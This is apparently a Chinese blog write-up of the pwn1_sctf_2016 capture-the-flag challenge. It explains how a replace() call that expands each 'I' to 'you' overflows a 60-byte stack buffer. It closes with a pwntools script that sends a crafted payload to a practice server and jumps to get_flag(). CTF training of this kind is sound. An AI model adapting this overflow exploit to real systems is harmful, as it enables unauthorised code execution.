当前位置：网站首页>pwn1_sctf_2016

pwn1_sctf_2016

2022-07-23 23:28:00 【长街395】

文章目录

一、查看文件
二、IDA反编译
三、代码
总结

一、查看文件

先file ./pwn1_sctf_2016查看文件类型再checksec --file=pwn1_sctf_2016检查一下文件保护情况。
在这里插入图片描述

二、IDA反编译

用IDA Pro 32bit打开pwn1_sctf_2016后按F5反汇编源码并查看主函数，发现vuln()函数。

在这里插入图片描述
双击vuln()函数查看源码，分析后发现fgets()函数限制输入32个字节到变量s中，乍一看并没有超出可用栈大小。
再按一次F5后发现第19行的replace()函数会把输入的I替换成you，1个字符变成3个字符。并且在第27行会对原来的s变量重新赋值。
在这里插入图片描述在Functions window可以看到有一个get_flag()函数，按F5反汇编可以看到这是一个系统调用，且get_flag()函数的起始地址为0x8048F0D。

查看栈结构发现s的长度为0x3c，即60个字节，而输入被限制在32个字节内，每个I可以被替换成you，所以输入60÷3=20个I就能让栈溢出，然后db 4 dup(?) 还需要占用4个字节的内存，最后加上get_flag()函数的起始地址0x8048F0D构成payload。
在这里插入图片描述

三、代码

from pwn import *
# remote()建立远程连接,指明ip和port
io = remote('node4.buuoj.cn', 25314)
payload = b'I'*20 + b'a'*0x4 + p32(0x8048F0D)
io.sendline(payload) #发送数据
io.interactive() #与shell进行交互